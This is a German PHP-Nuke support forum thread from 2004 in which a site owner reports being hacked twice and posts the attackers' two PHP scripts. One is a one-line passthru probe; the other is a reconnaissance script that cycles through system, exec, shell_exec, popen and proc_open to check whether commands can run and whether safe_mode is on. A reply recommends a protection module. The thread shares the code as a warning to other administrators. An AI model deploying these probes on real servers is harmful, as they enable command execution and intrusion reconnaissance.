PHPNuker


Hilft da wo andere versagen, und noch ein Stück weiter.!



  

          Username:     Password:                

headerPHPNuker - Addon Theme Module Wysiwyg - FCKeditor PHPNuker Download Archiv PHPNuker Support Forum PHPNuker Community Account PHPNuke Weblinks

               
pixel
 
Freiesoft.de
Anzeige
PHPNuker.de :: Thema anzeigen - 2 mal diese Woche gehackt worden
 FAQFAQ   SuchenSuchen   BenutzergruppenBenutzergruppen   ProfilProfil   Einloggen, um private Nachrichten zu lesenEinloggen, um private Nachrichten zu lesen   LoginLogin 

2 mal diese Woche gehackt worden

 
Neues Thema eröffnen   Neue Antwort erstellen    PHPNuker.de Foren-Übersicht -> PHPNuke 6.6 - 7.0
Vorheriges Thema anzeigen :: Nächstes Thema anzeigen  
Autor Nachricht
ffx
Specialman
Specialman


Anmeldungsdatum: Sep 06, 2004
Beiträge: 421
Wohnort: NRW
BeitragVerfasst am: So Sep 26, 2004 4:04 pm    Titel: 2 mal diese Woche gehackt worden Antworten mit Zitat
Meine Freeware-base.de wurde diese Woche gleich 2
mal gehackt, laufen tut diese unter PHPNuke 7.0, wem es intressiert wie sie es gemacht haben, der schaue sich mal den Code an:

der erste Hack:

Code:
<?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?>


der zweite Hack:

Code:
<?PHP

$OSTYPE = $HTTP_ENV_VARS['OSTYPE'];

$MACHTYPE = $HTTP_ENV_VARS['MACHTYPE'];

$cmd="uname";
if($UNAME = @system($cmd))   {}
elseif($UNAME = @exec($cmd))   {}
elseif($UNAME = @shell_exec($cmd))   {}
elseif($fp = @popen($cmd,'r')) { $UNAME = fgets($fp,300); pclose($fp);}
else {
   $descriptorspec = array(
      0 => array("pipe", "r"),  // stdin
      1 => array("pipe", "w"),  // stdout
      2 => array("pipe", "w") // stderr
   );
   $process = @proc_open($cmd, $descriptorspec, $pipes);
   if (is_resource($process)) {
      fclose($pipes[0]);
      $UNAME = fgets($pipes[1], 1024);
      fclose($pipes[1]);
      fclose($pipes[2]);
      $ret = proc_close($process);
   }
}

if($UNAME) { $EXEC = 1; }
else { $EXEC = 0; }

if(!$UNAME && $OSTYPE) { $UNAME=$OSTYPE; }
else if(!$UNAME && !$OSTYPE && $MACHTYPE) { $UNAME=$MACHTYPE; }

if($smode = @ini_get('safe_mode')) {}
elseif($smode = @get_cfg_var('safe_mode')) {}
else { $smode=0; }


echo "<pre>\n";

echo '%%suxx' . 'ezz%%OSTYPE:' . chop($UNAME) . '%%EXEC:' . $EXEC . '%%SMODE:' . $smode . "%%\n";

echo "</pre>\n";

exit;

?>


beide male wurde das Script als Modul ausgef?hrt von einer Fremden Adresse. Die konnten zwar nicht viel erreichen, beim erten mal, aber beim zweiten mal haben die mir ca. 2300 Artikel gekillt.

Also passt auf Nuke 7.0 hat da wohl ziemlich viele löcher.
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen
Google
Verfasst am:     Titel:
Nach oben
MrFluffy
Newbie
Newbie


Anmeldungsdatum: Sep 06, 2004
Beiträge: 14
Wohnort: Berlin
BeitragVerfasst am: Mo Sep 27, 2004 11:43 am    Titel: Antworten mit Zitat
Es gab in der letzten Woche eine ganze Welle dieser Scriptattacken.
Auf allen meinen Seiten zusammen hat Sentinel 16 davon abgefangen.
_________________
cu,
MrFluffy

[img]http://www.conrads-berlin.de/signature.php[/img]
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen AIM-Name Yahoo Messenger MSN Messenger
ffx
Specialman
Specialman


Anmeldungsdatum: Sep 06, 2004
Beiträge: 421
Wohnort: NRW
BeitragVerfasst am: Mo Sep 27, 2004 12:41 pm    Titel: Antworten mit Zitat
na ich glaube dann sollte ich mir dieses Sentinel auch mal genauer anschauen, solche Attacken machen einen nur unnötige arbeit.
Habe anschlie?end 2 Seiten komplett auf nuke 7.5 umgestellt (dort hat man die IP Ban Funktion).
Was macht eigentlich Sentinel genau ?
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen
MrFluffy
Newbie
Newbie


Anmeldungsdatum: Sep 06, 2004
Beiträge: 14
Wohnort: Berlin
BeitragVerfasst am: Mo Sep 27, 2004 12:58 pm    Titel: Antworten mit Zitat
Da ist eine ganze Menge, Harvester-, Referer, CLIKE-, UNION-, STRING-Blocker, admin-Schutz (authors-Tabelle) / HTTP-Auth Zugangsschutz, DOS Protection, und, und, und. Zusammen mit Nuke Patched ein sehr gutes Schutzpaket.
Bei mir hat bisher noch keiner Erfolg gehabt, toi, toi, toi.
_________________
cu,
MrFluffy

[img]http://www.conrads-berlin.de/signature.php[/img]
Nach oben
Benutzer-Profile anzeigen Private Nachricht senden Website dieses Benutzers besuchen AIM-Name Yahoo Messenger MSN Messenger
Beiträge der letzten Zeit anzeigen:   
Neues Thema eröffnen   Neue Antwort erstellen    PHPNuker.de Foren-Übersicht -> PHPNuke 6.6 - 7.0 Alle Zeiten sind GMT
Seite 1 von 1

 
Gehe zu:  
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.

Powered by phpBB © 2001, 2005 phpBB Group
Design @ 2004 Freenuke -/- modifiziert PHPNuker.de
All logos and trademarks in this site are property of their respective owner. The comments are property of their posters,
all the rest (c) 2004-2012 by phpnuker.de.

Erstellung der Seite: 0.06 Sekunden